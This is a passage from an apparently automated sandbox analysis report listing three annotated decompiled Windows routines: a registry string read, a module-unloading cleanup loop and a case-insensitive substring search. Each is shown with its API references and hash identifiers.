                    				} else {
                    					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                    					_t21 = RegCloseKey(_a20);
                    					_t30[0x7fe] = _t30[0x7fe] & 0x00000000; // force termination at the end of the buffer
                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) { // reject anything but REG_SZ / REG_EXPAND_SZ
                    						goto L4;
                    					}
                    				}
                    				return _t21;
                    			}








                    APIs
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 0040642E
                    • RegCloseKey.ADVAPI32(?), ref: 00406439
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CloseQueryValue
                    • String ID: Call
                    • API String ID: 3356406503-1824292864
                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			// Decompiled cleanup routine: walks the singly linked list of loaded
                    			// modules whose head lives at 0x79ff0c (next pointer at offset 0, HMODULE
                    			// at offset 8), unloads each module, frees the node, then clears the head.
                    			E00403B34() {
                    				void* _t2;
                    				void* _t3;
                    				void* _t6;
                    				void* _t8;
                    
                    				_t8 =  *0x79ff0c; // 0x9e8440 at the time of the dump
                    				_t3 = E00403B19(_t2, 0);
                    				if(_t8 != 0) {
                    					do {
                    						_t6 = _t8;
                    						_t8 =  *_t8; // advance to the next node before freeing this one
                    						FreeLibrary( *(_t6 + 8));
                    						_t3 = GlobalFree(_t6);
                    					} while (_t8 != 0);
                    				}
                    				 *0x79ff0c =  *0x79ff0c & 0x00000000; // list head reset to NULL
                    				return _t3;
                    			}








                    APIs
                    • FreeLibrary.KERNEL32(?,7556D4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
                    • GlobalFree.KERNEL32(009E8440), ref: 00403B55
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Free$GlobalLibrary
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 1100898210-4017390910
                    • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                    • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                    • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                    • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			// Decompiled case-insensitive substring search: returns a pointer to the
                    			// first position in _a4 where _a8 matches (ignoring case), or 0 if none.
                    			// At each position the haystack is temporarily terminated after
                    			// lstrlen(_a8) characters so lstrcmpiA can compare just that window.
                    			E00405F6F(void* __ecx, CHAR* _a4, CHAR* _a8) {
                    				int _v8;
                    				int _t12;
                    				int _t14;
                    				int _t15;
                    				CHAR* _t17;
                    				CHAR* _t27;
                    
                    				_t12 = lstrlenA(_a8);
                    				_t27 = _a4;
                    				_v8 = _t12; // needle length
                    				while(lstrlenA(_t27) >= _v8) { // stop once the remaining haystack is shorter than the needle
                    					_t14 = _v8;
                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000; // temporarily cut the haystack
                    					_t15 = lstrcmpiA(_t27, _a8);
                    					_t27[_v8] =  *(_t14 + _t27); // restore the overwritten character (saved value not visible in the decompilation)
                    					if(_t15 == 0) {
                    						_t17 = _t27; // match found at the current position
                    					} else {
                    						_t27 = CharNextA(_t27); // advance one (possibly multi-byte) character
                    						continue;
                    					}
                    					L5:
                    					return _t17;
                    				}
                    				_t17 = 0; // no match
                    				goto L5;
                    			}










                    APIs
                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F97
                    • CharNextA.USER32(00000000), ref: 00405FA8
                    • lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                    • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                    • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                    • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8
                    Uniqueness

                    Uniqueness Score: -1.00%